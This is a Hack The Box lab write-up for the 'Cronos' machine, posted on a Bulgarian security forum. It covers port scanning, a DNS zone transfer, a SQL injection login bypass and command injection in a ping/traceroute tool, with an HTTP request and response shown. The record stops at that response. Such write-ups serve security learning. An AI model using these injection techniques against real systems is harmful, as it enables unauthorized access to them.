Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps



# Enumeration
The enumeration results show 3 open ports:

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running. Let's research on it a little bit more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.

I was having problems connecting to the web service so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]]

DNS Enumeration (link)

Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines.

$ dig axfr @ cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @ cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A
admin.cronos.htb.    604800    IN    A
ns1.cronos.htb.        604800    IN    A
www.cronos.htb.        604800    IN    A
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)

I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them on the browser. 
![[Pasted image 20210413101836.png]]

# Admin.cronos.htb & SQLi
![[Pasted image 20210413101925.png]]

A Quick SQLi check let's us in.
![[Pasted image 20210413102037.png]]

Two tools are running on the welcome.php page. *Ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.### Request

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1


I have encoded a semicolon and added the ls command for the current directory.
### Response

HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

      <title>Net Tool v0.1 </title>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    <input type="text" name="host" value=""/>
    <input type="submit" value="Execute!"/>
              <p><a href = "logout.php">Sign Out</a></p>



Recommended Comments

Няма коментари

HACKING.BG Партньори


  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy